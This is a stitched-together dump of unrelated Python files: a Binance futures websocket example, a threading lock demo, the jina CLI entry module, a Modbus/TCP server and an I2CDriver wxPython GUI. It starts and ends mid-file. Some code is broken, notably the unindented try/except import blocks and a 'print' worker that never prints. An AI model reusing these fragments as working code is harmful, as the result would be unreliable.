filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Worker loop: drain the manager's stream_buffer until the manager stops.

    :param binance_websocket_api_manager: manager whose buffer is polled.
    :return: None once the manager reports it is stopping.
    """
    while True:
        if binance_websocket_api_manager.is_manager_stopping():
            # Fix: `exit(0)` raised SystemExit inside this worker thread, which
            # only terminated the thread anyway; an explicit return is clearer
            # and safe if the function is ever called from the main thread.
            return
        oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if oldest_stream_data_from_stream_buffer is False:
            # Buffer empty: back off briefly instead of busy-spinning.
            time.sleep(0.01)
# create instance of BinanceWebSocketApiManager for Binance.com Futures
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.com-futures")

# set api key and secret for userData stream
binance_je_api_key = ""
binance_je_api_secret = ""
userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"],
                                                                 ["!userData"],
                                                                 api_key=binance_je_api_key,
                                                                 api_secret=binance_je_api_secret)
bookticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!bookTicker"])
# https://binance-docs.github.io/apidocs/futures/en/#mark-price-stream-for-all-market
binance_websocket_api_manager.create_stream(["!markPrice"], "arr@1s", stream_label="!markPrice@arr@1s")

# one stream per channel for the three monitored futures markets
markets = {'btcusdt', 'bchusdt', 'ethusdt'}
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["markPrice"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["bookTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth@2500ms"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth5@100ms"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["compositeIndex"], markets, stream_label="compositeIndex")

# Fix: the original set literal was missing a comma between 'markPrice' and
# 'kline_1m'; implicit string concatenation produced the bogus channel
# 'markPricekline_1m' and silently dropped both intended channels.
channels = {'aggTrade', 'markPrice', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h',
            'miniTicker', 'depth20@100ms', 'bookTicker', 'forceOrder', '!forceOrder', 'kline_1w@250ms',
            'compositeIndex'}
binance_websocket_api_manager.create_stream(channels, markets)

# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()

# show an overview
while True:
    binance_websocket_api_manager.print_summary()
    time.sleep(1)
|
ex1.py | import threading
NUM_THREAD = 10  # number of worker threads to spawn
mutex = threading.Lock()  # guards the one-shot `printed` flag
printed = False  # set True by the first thread to enter the critical section
def print_text():
    """Print "printed once" exactly once across all threads (first caller wins)."""
    global printed
    # Fix: use the lock as a context manager so it is released even if the
    # body raises; the original manual acquire()/release() pair would leave
    # the lock held forever if an exception occurred in between.
    with mutex:
        if not printed:
            printed = True
            print("printed once")
# Spawn the workers, then wait for every one of them to finish.
threads = []
for _ in range(NUM_THREAD):
    worker = threading.Thread(target=print_text)
    threads.append(worker)
    worker.start()
for worker in threads:
    worker.join()
|
__init__.py | import os
import shutil
import subprocess
import sys
from packaging.version import Version, parse
def _get_run_args(print_args: bool = True):
    """Parse the CLI arguments for the current jina command.

    :param print_args: when True, print the jina logo and a table of the
        parsed arguments (values differing from their defaults highlighted).
    :return: the parsed argparse namespace; prints help and exits when no
        command-line arguments were given.
    """
    from jina.helper import get_rich_console
    from jina.parsers import get_main_parser

    console = get_rich_console()
    silent_print = {'help', 'hub'}  # sub-commands that skip the arg table
    parser = get_main_parser()
    if len(sys.argv) > 1:
        from argparse import _StoreAction, _StoreTrueAction
        from rich import box
        from rich.table import Table

        args, unknown = parser.parse_known_args()
        if unknown:
            from jina.helper import warn_unknown_args

            # only warn about unknown --flags, not stray positionals
            unknown = list(filter(lambda x: x.startswith('--'), unknown))
            warn_unknown_args(unknown)
        if args.cli not in silent_print and print_args:
            from jina import __resources_path__

            # NOTE(review): relies on private argparse internals; the last
            # parser action is assumed to hold the sub-command choices.
            p = parser._actions[-1].choices[sys.argv[1]]
            default_args = {
                a.dest: a.default
                for a in p._actions
                if isinstance(a, (_StoreAction, _StoreTrueAction))
            }
            with open(os.path.join(__resources_path__, 'jina.logo')) as fp:
                logo_str = fp.read()
            param_str = Table(title=None, box=box.ROUNDED, highlight=True)
            param_str.add_column('')
            param_str.add_column('Parameters', justify='right')
            param_str.add_column('Value', justify='left')
            for k, v in sorted(vars(args).items()):
                # wrench marker + highlight for values changed from default
                sign = ' ' if default_args.get(k, None) == v else '🔧️'
                param = k.replace('_', '-')
                value = str(v)
                style = None if default_args.get(k, None) == v else 'blue on yellow'
                param_str.add_row(sign, param, value, style=style)
            print(f'\n{logo_str}\n')
            console.print(f'▶️ {" ".join(sys.argv)}', param_str)
        return args
    else:
        parser.print_help()
        exit()
def _quick_ac_lookup():
    """Serve the shell-autocompletion helper commands, exiting if one matched.

    ``jina commands`` prints every top-level command; ``jina completions ...``
    prints the completions registered for the longest known prefix of the
    typed words. Both paths terminate the process via exit().
    """
    from cli.autocomplete import ac_table

    if len(sys.argv) > 1:
        if sys.argv[1] == 'commands':
            for k in ac_table['commands']:
                print(k)
            exit()
        elif sys.argv[1] == 'completions':
            # search with the longest shared prefix
            for j in range(len(sys.argv), 2, -1):
                _input = ' '.join(sys.argv[2:j]).strip()
                if _input in ac_table['completions']:
                    compl = ac_table['completions'][_input]
                    for k in compl:
                        # do not suggest words already typed
                        if k not in sys.argv:
                            print(k)
                    break
            exit()
def _parse_latest_release_version(resp):
    """Return the newest non-prerelease version found in a PyPI JSON response.

    :param resp: file-like object containing the payload of
        ``https://pypi.org/pypi/<package>/json``.
    :return: a ``packaging`` version object for the latest stable release,
        or ``parse('0')`` when none is listed.
    """
    # credit: https://stackoverflow.com/a/34366589
    import json

    latest_release_ver = parse('0')
    j = json.load(resp)
    # 'releases' maps version-string -> file list; iterating yields the
    # version strings. Fix: default to {} (the field's actual type), not [].
    releases = j.get('releases', {})
    for release in releases:
        latest_ver = parse(release)
        if not latest_ver.is_prerelease:
            latest_release_ver = max(latest_release_ver, latest_ver)
    return latest_release_ver
def _is_latest_version(package='jina', suppress_on_error=True):
    """Check PyPI for a newer stable release of *package* and warn if found.

    :param package: distribution name to look up on PyPI.
    :param suppress_on_error: when True, swallow any failure (no network,
        timeout, PyPI down) and return None; when False, re-raise it.
    :return: True if up to date, False if a newer stable release exists,
        None on suppressed error.
    """
    try:
        import warnings
        from urllib.request import Request, urlopen

        import pkg_resources

        cur_ver = Version(pkg_resources.get_distribution(package).version)
        req = Request(
            f'https://pypi.python.org/pypi/{package}/json',
            headers={'User-Agent': 'Mozilla/5.0'},
        )
        with urlopen(
            req, timeout=5
        ) as resp:  # 'with' is important to close the resource after use
            latest_release_ver = _parse_latest_release_version(resp)
        if cur_ver < latest_release_ver:
            from jina.logging.predefined import default_logger

            default_logger.warning(
                f'You are using {package} version {cur_ver}, however version {latest_release_ver} is available. '
                f'You should consider upgrading via the "pip install --upgrade {package}" command.'
            )
            return False
        return True
    except Exception:
        # Fix: the original bare `except:` also swallowed KeyboardInterrupt
        # and SystemExit; catching Exception lets user interrupts propagate.
        # no network, too slow, PyPi is down
        if not suppress_on_error:
            raise
def _is_latest_version_plugin(subcommand):
    """If *subcommand* is a known plugin, warn when its pip package is outdated."""
    from .known_plugins import plugin_info

    if subcommand in plugin_info:
        _is_latest_version(package=plugin_info[subcommand]['pip-package'])
def _try_plugin_command():
    """Tries to call the CLI of an external Jina project.

    :return: if the plugin has been found (locally or among the known plugins)
    """
    argv = sys.argv
    if len(argv) < 2:  # no command given
        return False

    from .autocomplete import ac_table

    if argv[1] in ac_table['commands']:  # native command can't be plugin command
        return False

    def _cmd_exists(cmd):
        # True when `cmd` resolves to an executable on PATH
        return shutil.which(cmd) is not None

    subcommand = argv[1]
    cmd = 'jina-' + subcommand
    if _cmd_exists(cmd):
        # Plugin installed locally: version-check it in the background and
        # delegate the remaining argv to the external executable.
        import threading

        threading.Thread(
            target=_is_latest_version_plugin,
            daemon=True,
            args=(subcommand,),
        ).start()
        subprocess.run([cmd] + argv[2:])
        return True

    from .known_plugins import plugin_info

    if subcommand in plugin_info:
        # Known plugin that is not installed: print an install hint instead.
        from jina.helper import get_rich_console

        cmd_info = plugin_info[subcommand]
        project, package = cmd_info['display-name'], cmd_info['pip-package']
        console = get_rich_console()
        console.print(
            f"It seems like [yellow]{project}[/yellow] is not installed in your environment."
            f"To use it via the [green]'jina {subcommand}'[/green] command, "
            f"install it first: [green]'pip install {package}'[/green]."
        )
        return True
    return False
def main():
    """The main entrypoint of the CLI"""
    # checking version info in another thread
    import threading

    threading.Thread(target=_is_latest_version, daemon=True, args=('jina',)).start()
    found_plugin = _try_plugin_command()
    if not found_plugin:
        # autocomplete helpers may exit() here; otherwise dispatch to cli.api
        _quick_ac_lookup()
        from cli import api

        args = _get_run_args()
        # e.g. `jina hello-world` dispatches to api.hello_world(args)
        getattr(api, args.cli.replace('-', '_'))(args)
|
server.py | # -*- coding: utf-8 -*-
# Python module: ModbusServer class (ModBus/TCP Server)
from . import constants as const
from .utils import test_bit, set_bit
import socket
import struct
from threading import Lock, Thread
# for python2 compatibility
try:
from socketserver import BaseRequestHandler, ThreadingTCPServer
except ImportError:
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class DataBank:
    """Data class for thread safe access to bits and words space.

    Holds the four Modbus data spaces: coils and discrete inputs (bit
    spaces), holding and input registers (16-bit word spaces). Every
    accessor is bounds-checked and returns None on an out-of-range request
    so the server can answer with a Modbus exception. The eight public
    classmethods previously duplicated the same locked slice logic; it is
    now factored into the _read/_write helpers (same behavior, including
    converting values before the bounds check so ValueError is raised for
    bad values even on out-of-range writes).
    """

    # coils, holding registers
    bits_lock = Lock()
    bits = [False] * 0x10000
    words_lock = Lock()
    words = [0] * 0x10000
    # discrete inputs, input registers
    bits2_lock = Lock()
    bits2 = [False] * 0x10000
    words2_lock = Lock()
    words2 = [0] * 0x10000

    @staticmethod
    def _read(lock, space, address, number):
        """Return space[address:address+number] under lock, or None if out of range."""
        # secure extract of data from list used by server thread
        with lock:
            if (address >= 0) and (address + number <= len(space)):
                return space[address: number + address]
            return None

    @staticmethod
    def _write(lock, space, address, values):
        """Copy *values* into *space* at *address* under lock.

        :returns: True on success or None if the span is out of range.
        """
        # secure copy of data to list used by server thread
        with lock:
            if (address >= 0) and (address + len(values) <= len(space)):
                space[address: address + len(values)] = values
                return True
            return None

    @classmethod
    def get_coils(cls, address, number=1):
        """Read *number* coils starting at *address*; list of bool or None on error."""
        return cls._read(cls.bits_lock, cls.bits, address, number)

    @classmethod
    def get_discrete_inputs(cls, address, number=1):
        """Read *number* discrete inputs starting at *address*; list of bool or None."""
        return cls._read(cls.bits2_lock, cls.bits2, address, number)

    @classmethod
    def set_coils(cls, address, bit_list):
        """Write a list of bool to the coil space; True on success, None on error.

        :raises ValueError: if bit_list members cannot be convert to bool
        """
        # ensure bit_list values are bool
        return cls._write(cls.bits_lock, cls.bits, address, [bool(b) for b in bit_list])

    @classmethod
    def set_discrete_inputs(cls, address, bit_list):
        """Write a list of bool to the discrete-input space; True on success, None on error.

        :raises ValueError: if bit_list members cannot be convert to bool
        """
        # ensure bit_list values are bool
        return cls._write(cls.bits2_lock, cls.bits2, address, [bool(b) for b in bit_list])

    @classmethod
    def get_holding_registers(cls, address, number=1):
        """Read *number* holding registers starting at *address*; list of int or None."""
        return cls._read(cls.words_lock, cls.words, address, number)

    @classmethod
    def get_input_registers(cls, address, number=1):
        """Read *number* input registers starting at *address*; list of int or None."""
        return cls._read(cls.words2_lock, cls.words2, address, number)

    @classmethod
    def set_holding_registers(cls, address, word_list):
        """Write 16-bit words to the holding-register space; True on success, None on error.

        :raises ValueError: if word_list members cannot be convert to int
        """
        # ensure word_list values are int with a max bit length of 16
        return cls._write(cls.words_lock, cls.words, address, [int(w) & 0xffff for w in word_list])

    @classmethod
    def set_input_registers(cls, address, word_list):
        """Write 16-bit words to the input-register space; True on success, None on error.

        :raises ValueError: if word_list members cannot be convert to int
        """
        # ensure word_list values are int with a max bit length of 16
        return cls._write(cls.words2_lock, cls.words2, address, [int(w) & 0xffff for w in word_list])
class ModbusServer(object):
    """Modbus TCP server"""

    class ModbusService(BaseRequestHandler):
        """Per-connection request handler (one thread per TCP client)."""

        def recv_all(self, size):
            """Read exactly `size` bytes from the client socket.

            Uses MSG_WAITALL where available; falls back to a manual loop
            on platforms (Windows) that lack it.
            """
            if hasattr(socket, "MSG_WAITALL"):
                data = self.request.recv(size, socket.MSG_WAITALL)
            else:
                # Windows lacks MSG_WAITALL
                data = b''
                while len(data) < size:
                    data += self.request.recv(size - len(data))
            return data

        def handle(self):
            """Serve Modbus/TCP frames until the client disconnects or a
            malformed frame is received (any `break` closes the connection).
            """
            while True:
                rx_head = self.recv_all(7)
                # close connection if no standard 7 bytes header
                if not (rx_head and len(rx_head) == 7):
                    break
                # decode MBAP header
                (rx_hd_tr_id, rx_hd_pr_id,
                 rx_hd_length, rx_hd_unit_id) = struct.unpack('>HHHB', rx_head)
                # close connection if frame header content inconsistency
                if not ((rx_hd_pr_id == 0) and (2 < rx_hd_length < 256)):
                    break
                # receive body
                rx_body = self.recv_all(rx_hd_length - 1)
                # close connection if lack of bytes in frame body
                if not (rx_body and (len(rx_body) == rx_hd_length - 1)):
                    break
                # body decode: function code
                rx_bd_fc = struct.unpack('B', rx_body[0:1])[0]
                # close connection if function code is inconsistent
                if rx_bd_fc > 0x7F:
                    break
                # default except status
                exp_status = const.EXP_NONE
                # functions Read Coils (0x01) or Read Discrete Inputs (0x02)
                # (merged: the two branches were byte-identical except for the
                #  DataBank getter they called)
                if rx_bd_fc in (const.READ_COILS, const.READ_DISCRETE_INPUTS):
                    (b_address, b_count) = struct.unpack('>HH', rx_body[1:])
                    # check quantity of requested bits
                    if 0x0001 <= b_count <= 0x07D0:
                        if rx_bd_fc == const.READ_COILS:
                            bits_l = DataBank.get_coils(b_address, b_count)
                        else:
                            bits_l = DataBank.get_discrete_inputs(b_address, b_count)
                        if bits_l:
                            # allocate bytes list: one byte per 8 bits, rounded up
                            b_size = int(b_count / 8)
                            b_size += 1 if (b_count % 8) else 0
                            bytes_l = [0] * b_size
                            # populate bytes list with data bank bits
                            for i, item in enumerate(bits_l):
                                if item:
                                    byte_i = int(i / 8)
                                    bytes_l[byte_i] = set_bit(bytes_l[byte_i], i % 8)
                            # format body of frame with bits
                            tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
                            # add bytes with bits
                            for byte in bytes_l:
                                tx_body += struct.pack('B', byte)
                        else:
                            exp_status = const.EXP_DATA_ADDRESS
                    else:
                        exp_status = const.EXP_DATA_VALUE
                # functions Read Holding Registers (0x03) or Read Input Registers (0x04)
                elif rx_bd_fc in (const.READ_HOLDING_REGISTERS, const.READ_INPUT_REGISTERS):
                    (w_address, w_count) = struct.unpack('>HH', rx_body[1:])
                    # check quantity of requested words
                    if 0x0001 <= w_count <= 0x007D:
                        if rx_bd_fc == const.READ_HOLDING_REGISTERS:
                            words_l = DataBank.get_holding_registers(w_address, w_count)
                        else:
                            words_l = DataBank.get_input_registers(w_address, w_count)
                        if words_l:
                            # format body of frame with words
                            tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
                            for word in words_l:
                                tx_body += struct.pack('>H', word)
                        else:
                            exp_status = const.EXP_DATA_ADDRESS
                    else:
                        exp_status = const.EXP_DATA_VALUE
                # function Write Single Coil (0x05)
                # NOTE: these comparisons used `is`, which only worked through
                # CPython's small-int caching; use `==` for value equality.
                elif rx_bd_fc == const.WRITE_SINGLE_COIL:
                    (b_address, b_value) = struct.unpack('>HH', rx_body[1:])
                    # per spec, 0xFF00 means ON, anything else is treated as OFF
                    f_b_value = bool(b_value == 0xFF00)
                    if DataBank.set_coils(b_address, [f_b_value]):
                        # send write ok frame
                        tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_value)
                    else:
                        exp_status = const.EXP_DATA_ADDRESS
                # function Write Single Register (0x06)
                elif rx_bd_fc == const.WRITE_SINGLE_REGISTER:
                    (w_address, w_value) = struct.unpack('>HH', rx_body[1:])
                    if DataBank.set_holding_registers(w_address, [w_value]):
                        # send write ok frame
                        tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_value)
                    else:
                        exp_status = const.EXP_DATA_ADDRESS
                # function Write Multiple Coils (0x0F)
                elif rx_bd_fc == const.WRITE_MULTIPLE_COILS:
                    (b_address, b_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
                    # check quantity of updated coils
                    if (0x0001 <= b_count <= 0x07B0) and (byte_count >= (b_count / 8)):
                        # allocate bits list
                        bits_l = [False] * b_count
                        # populate bits list with bits from rx frame
                        for i, item in enumerate(bits_l):
                            b_bit_pos = int(i / 8) + 6
                            b_bit_val = struct.unpack('B', rx_body[b_bit_pos:b_bit_pos + 1])[0]
                            bits_l[i] = test_bit(b_bit_val, i % 8)
                        # write bits to data bank
                        if DataBank.set_coils(b_address, bits_l):
                            # send write ok frame
                            tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_count)
                        else:
                            exp_status = const.EXP_DATA_ADDRESS
                    else:
                        exp_status = const.EXP_DATA_VALUE
                # function Write Multiple Registers (0x10)
                elif rx_bd_fc == const.WRITE_MULTIPLE_REGISTERS:
                    (w_address, w_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
                    # check quantity of updated words
                    if (0x0001 <= w_count <= 0x007B) and (byte_count == w_count * 2):
                        # allocate words list
                        words_l = [0] * w_count
                        # populate words list with words from rx frame
                        for i, item in enumerate(words_l):
                            w_offset = i * 2 + 6
                            words_l[i] = struct.unpack('>H', rx_body[w_offset:w_offset + 2])[0]
                        # write words to data bank
                        if DataBank.set_holding_registers(w_address, words_l):
                            # send write ok frame
                            tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_count)
                        else:
                            exp_status = const.EXP_DATA_ADDRESS
                    else:
                        exp_status = const.EXP_DATA_VALUE
                else:
                    exp_status = const.EXP_ILLEGAL_FUNCTION
                # check exception
                if exp_status != const.EXP_NONE:
                    # format body of frame with exception status
                    tx_body = struct.pack('BB', rx_bd_fc + 0x80, exp_status)
                # build frame header
                tx_head = struct.pack('>HHHB', rx_hd_tr_id, rx_hd_pr_id, len(tx_body) + 1, rx_hd_unit_id)
                # send frame
                self.request.send(tx_head + tx_body)
            self.request.close()

    def __init__(self, host='localhost', port=const.MODBUS_PORT, no_block=False, ipv6=False):
        """Constructor

        Modbus server constructor.

        :param host: hostname or IPv4/IPv6 address server address (optional)
        :type host: str
        :param port: TCP port number (optional)
        :type port: int
        :param no_block: set no block mode, in this mode start() return (optional)
        :type no_block: bool
        :param ipv6: use ipv6 stack
        :type ipv6: bool
        """
        # public
        self.host = host
        self.port = port
        self.no_block = no_block
        self.ipv6 = ipv6
        # private
        self._running = False
        self._service = None
        self._serve_th = None

    def start(self):
        """Start the server.

        Do nothing if server is already running.
        This function will block if no_block is not set to True.
        """
        if not self.is_run:
            # set class attribute
            ThreadingTCPServer.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
            ThreadingTCPServer.daemon_threads = True
            # init server (bind/activate done manually after socket options)
            self._service = ThreadingTCPServer((self.host, self.port), self.ModbusService, bind_and_activate=False)
            # set socket options
            self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
            # TODO test no_delay with bench
            self._service.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            # bind and activate
            self._service.server_bind()
            self._service.server_activate()
            # serve request
            if self.no_block:
                # NOTE(review): _running is only set inside _serve, so is_run may
                # briefly read False right after a no_block start() returns.
                self._serve_th = Thread(target=self._serve)
                self._serve_th.daemon = True
                self._serve_th.start()
            else:
                self._serve()

    def stop(self):
        """Stop the server.

        Do nothing if server is already not running.
        """
        if self.is_run:
            self._service.shutdown()
            self._service.server_close()

    @property
    def is_run(self):
        """Return True if server running.
        """
        return self._running

    def _serve(self):
        # accept loop; flags _running so is_run reflects server state
        try:
            self._running = True
            self._service.serve_forever()
        except:
            # bare except is deliberate: close the listening socket, then
            # re-raise whatever interrupted the loop (incl. KeyboardInterrupt)
            self._service.server_close()
            raise
        finally:
            self._running = False
|
i2cgui.py | #!/usr/bin/env python
import time
import struct
import sys
import os
import re
import csv
import threading
from functools import partial
import serial.tools.list_ports as slp
import serial
try:
import wx
import wx.lib.newevent as NE
except ImportError:
print("i2cgui.py needs wxPython, but it wasn't found.")
print("See https://www.wxpython.org/pages/downloads/")
sys.exit(1)
import i2cdriver
# Nominal pullup resistor value for each 3-bit code reported by the I2CDriver
# (list index == code). NOTE(review): several codes map to the same label
# ("2.2K", "1.5K"), so reverse lookup by label is ambiguous — confirm intended.
pullup_vals = [
    "disabled",
    "2.2K",
    "4.3K",
    "1.5K",
    "4.7K",
    "1.5K",
    "2.2K",
    "1.1K",
]
# Custom wx event posted once per second by ping_thr to drive status refresh.
PingEvent, EVT_PING = NE.NewEvent()
def ping_thr(win):
    """Background loop: post a PingEvent to `win` once per second, forever.

    Runs as a daemon thread; the PingEvent drives Frame.refresh().
    """
    post = wx.PostEvent
    pause = time.sleep
    while True:
        post(win, PingEvent())
        pause(1)
# Cross-thread flag: the GUI sets it to request capture shutdown; the capture
# worker clears it to acknowledge.
StopCapture = False


def capture_thr(sd, log_csv):
    """Worker thread: stream capture events from device `sd` into a CSV file.

    Increments sd.dumpcount per event; runs until the token stream ends or
    the global StopCapture flag is raised, then clears the flag and stops
    the device capture.
    """
    global StopCapture
    token_source = sd.capture_start(True)
    with open(log_csv, 'w') as csvfile:
        writer = csv.writer(csvfile)
        for token in token_source():
            if token:
                sd.dumpcount += 1
                token.dump(writer, "csv")  # write to CSV
            if StopCapture:
                break
    StopCapture = False
    sd.capture_stop()
class HexTextCtrl(wx.TextCtrl):
    """Text control that restricts its content to hex digits and spaces.

    Every edit is uppercased and stripped of non-[0-9A-F ] characters while
    preserving the caret/selection position.
    """

    def __init__(self, *args, **kwargs):
        super(HexTextCtrl, self).__init__(*args, **kwargs)
        self.Bind(wx.EVT_TEXT, self.on_text)

    def on_text(self, event):
        """Sanitize the control's text on every change event."""
        event.Skip()
        selection = self.GetSelection()
        value = self.GetValue().upper()
        allowed = " 0123456789ABCDEF"  # was named `hex`, shadowing the builtin
        value = "".join([c for c in value if c in allowed])
        # ChangeValue (unlike SetValue) does not emit another EVT_TEXT
        self.ChangeValue(value)
        self.SetSelection(*selection)
class MyDialog(wx.Dialog):
    """Minimal 250x150 modal dialog containing a single OK button."""

    def __init__(self, parent, title):
        super(MyDialog, self).__init__(parent, title=title, size=(250, 150))
        body = wx.Panel(self)
        self.btn = wx.Button(body, wx.ID_OK, label="ok", size=(50, 20), pos=(75, 50))
class Frame(wx.Frame):
    """Main i2cgui window.

    Connects to an I2CDriver board over a serial port and exposes its status,
    a device-scan heat map of I2C addresses, raw read/write controls, and the
    monitor / capture modes.
    """

    def __init__(self, preferred=None):
        self.sd = None  # i2cdriver.I2CDriver instance once connected

        # --- small local factories for sizers and widgets ----------------
        # (unused widepair/rpair helpers removed)
        def pair(a, b):
            r = wx.BoxSizer(wx.HORIZONTAL)
            r.Add(a, 1, wx.LEFT)
            r.Add(b, 0, wx.RIGHT)
            return r

        def epair(a, b):
            r = wx.BoxSizer(wx.HORIZONTAL)
            r.Add(a, 1, wx.LEFT)
            r.Add(b, 1, wx.RIGHT)
            return r

        def label(s):
            return wx.StaticText(self, label=s)

        def button(s, f):
            r = wx.Button(self, label=s)
            r.Bind(wx.EVT_BUTTON, f)
            return r

        def hbox(items):
            r = wx.BoxSizer(wx.HORIZONTAL)
            [r.Add(i, 0, wx.EXPAND) for i in items]
            return r

        def hcenter(i):
            r = wx.BoxSizer(wx.HORIZONTAL)
            r.AddStretchSpacer(prop=1)
            r.Add(i, 2, wx.CENTER)
            r.AddStretchSpacer(prop=1)
            return r

        def vbox(items):
            r = wx.BoxSizer(wx.VERTICAL)
            [r.Add(i, 0, wx.EXPAND) for i in items]
            return r

        wx.Frame.__init__(self, None, -1, "I2CDriver")
        self.bold = self.GetFont().Bold()
        # index 0: normal font (address absent), index 1: bold (present)
        self.addrfonts = [
            self.GetFont(),
            self.bold
        ]
        self.label_serial = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        self.label_voltage = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        self.label_current = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        self.label_temp = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        self.label_speed = wx.Choice(self, choices=["100", "400"])
        self.label_speed.Bind(wx.EVT_CHOICE, self.set_speed)
        pupch = sorted(set(pullup_vals), reverse=True)
        self.label_pullups = wx.Choice(self, choices=pupch)
        self.label_pullups.Bind(wx.EVT_CHOICE, self.set_pullups)
        self.label_sda = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        self.label_scl = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        self.label_uptime = wx.StaticText(self, label="-", style=wx.ALIGN_RIGHT)
        # widgets refreshed from device status; disabled until connected
        self.dynamic = [
            self.label_voltage,
            self.label_current,
            self.label_temp,
            self.label_speed,
            self.label_pullups,
            self.label_sda,
            self.label_scl,
            self.label_uptime
        ]
        [d.Enable(False) for d in self.dynamic]
        self.Bind(EVT_PING, self.refresh)

        def addrbutton(s):
            r = wx.RadioButton(self, label=s)
            r.Bind(wx.EVT_RADIOBUTTON, self.choose_addr)
            return r
        # one radio button per legal 7-bit I2C address (0x08..0x77)
        self.heat = {i: addrbutton("%02X" % i) for i in range(0x08, 0x78)}
        # Be careful here, GridSizer changed between wx 3.x and 4.x
        devgrid = wx.GridSizer(8)
        devgrid.SetHGap(4)
        devgrid.SetVGap(6)
        for i, l in sorted(self.heat.items()):
            devgrid.Add(l)
        self.monitor = False
        self.ckM = wx.ToggleButton(self, label="Monitor mode")
        self.ckM.Bind(wx.EVT_TOGGLEBUTTON, self.check_m)
        self.capture = False
        self.ckC = wx.ToggleButton(self, label="Capture mode")
        self.ckC.Bind(wx.EVT_TOGGLEBUTTON, self.check_c)
        self.txVal = HexTextCtrl(self, size=wx.DefaultSize, style=0)
        self.rxVal = HexTextCtrl(self, size=wx.DefaultSize, style=wx.TE_READONLY)
        txButton = wx.Button(self, label="write")
        txButton.Bind(wx.EVT_BUTTON, partial(self.write, self.txVal))
        self.rxCount = wx.SpinCtrl(self, min=1)
        rxButton = wx.Button(self, label="read")
        rxButton.Bind(wx.EVT_BUTTON, self.read)
        self.dev_widgets = [txButton, rxButton]
        self.reset_button = button("i2c reset", self.reset)
        self.stop_button = button("stop", self.stop)
        self.stop_button.Enable(False)
        self.allw = [self.ckM, self.reset_button]
        [w.Enable(False) for w in self.allw]
        self.devs = self.devices()
        cb = wx.ComboBox(self, choices=sorted(self.devs.keys()), style=wx.CB_READONLY)
        cb.Bind(wx.EVT_COMBOBOX, self.choose_device)
        self.no_addr()
        self.addr = None
        [self.hot(i, False) for i in self.heat]
        self.started = False
        info = vbox([
            pair(label("Serial"), self.label_serial),
            pair(label("Voltage"), self.label_voltage),
            pair(label("Current"), self.label_current),
            pair(label("Temp."), self.label_temp),
            pair(label("SDA"), self.label_sda),
            pair(label("SCL"), self.label_scl),
            pair(label("Running"), self.label_uptime),
            pair(label("Speed"), self.label_speed),
            pair(label("Pullups"), self.label_pullups),
        ])
        vb = vbox([
            label(""),
            hcenter(cb),
            label(""),
            hcenter(epair(self.ckM, self.ckC)),
            hcenter(self.reset_button),
            label(""),
            hcenter(info),
            label(""),
            hcenter(devgrid),
            label(""),
            hcenter(pair(self.txVal, txButton)),
            hcenter(pair(self.rxVal, hbox([self.rxCount, rxButton]))),
            label(""),
            hcenter(self.stop_button),
            label(""),
        ])
        self.SetSizerAndFit(vb)
        self.SetAutoLayout(True)
        # connect to the preferred device if present, else any working one
        d1 = None
        while (d1 is None) and (len(self.devs) > 0):
            if preferred in self.devs:
                d1 = preferred
            else:
                d1 = min(self.devs)
            try:
                self.connect(self.devs[d1])
            except Exception:
                # was a bare except: device is gone/busy -- drop it, try next
                del self.devs[d1]
                d1 = None
        cb.Set(sorted(self.devs.keys()))
        if d1 is not None:
            cb.SetValue(d1)
        t = threading.Thread(target=ping_thr, args=(self, ))
        t.daemon = True  # setDaemon() is deprecated (removed in Python 3.13)
        t.start()

    def start(self, rw):
        """Issue an I2C START to self.addr; rw=0 write, rw=1 read."""
        self.sd.start(self.addr, rw)
        self.started = True
        self.stop_button.Enable(True)

    def stop(self, e=None):
        """Issue an I2C STOP and disable the stop button."""
        self.sd.stop()
        self.started = False
        self.stop_button.Enable(False)

    def reset(self, e=None):
        """Reset the I2C bus."""
        self.sd.reset()
        self.started = False

    def write(self, htc, e):
